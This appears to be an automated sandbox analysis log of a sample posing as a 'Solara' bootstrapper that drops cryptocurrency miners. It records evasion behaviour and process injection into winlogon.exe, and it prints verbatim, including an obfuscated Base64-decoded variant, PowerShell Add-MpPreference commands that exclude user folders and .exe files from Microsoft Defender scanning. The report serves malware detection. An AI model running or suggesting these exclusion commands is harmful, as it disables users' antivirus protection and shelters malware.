Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle | 51_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle | 52_2_00000001400010C0
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Memory allocated: 2700000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Memory allocated: 48A0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 599813
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 599648
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 599500
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 599364
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 599224
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 599095
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 598956
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 598700
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 598584
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Thread delayed: delay time: 598404
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 359
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4419
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 363
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Window / User API: threadDelayed 432
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3620
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4205
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4182
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 5339
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 4659
Source: C:\Windows\System32\dialer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_51-480
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | API coverage: 0.3 %
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | API coverage: 0.3 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4720 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200 | Thread sleep count: 4966 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328 | Thread sleep count: 222 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396 | Thread sleep count: 5178 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496 | Thread sleep count: 359 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2992 | Thread sleep count: 4419 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2140 | Thread sleep count: 363 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -599813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -599648s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -599500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -599364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -599224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -599095s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -598956s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -598700s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -598584s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7384 | Thread sleep time: -598404s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7192 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 3652 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424 | Thread sleep count: 4205 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 | Thread sleep count: 194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 | Thread sleep count: 4182 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 | Thread sleep count: 207 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7592 | Thread sleep count: 5339 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7592 | Thread sleep time: -5339000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7592 | Thread sleep count: 4659 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7592 | Thread sleep time: -4659000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E8247DCE0 FindFirstFileExW | 19_2_0000027E8247DCE0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A8DCE0 FindFirstFileExW | 22_2_0000012C42A8DCE0
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589BDCE0 FindFirstFileExW | 66_2_000001E8589BDCE0
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_51-413
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_52-395
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82477D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000027E82477D90
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82471628 GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey,19_2_0000027E82471628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00401509 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401509
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeCode function: 10_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,10_2_004014D1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeCode function: 13_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,13_2_004014D1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82477D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000027E82477D90
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8247D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000027E8247D2A4
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A8D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000012C42A8D2A4
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A87D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000012C42A87D90
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001E8589B7D90
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001E8589BD2A4
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\eth.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\eth.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,51_2_0000000140001C88
Source: C:\Users\user\Desktop\Solara.exe | Process created: Base64 decoded <#pxn#>Add-MpPreference <#ayf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gae#> -Force <#wep#>
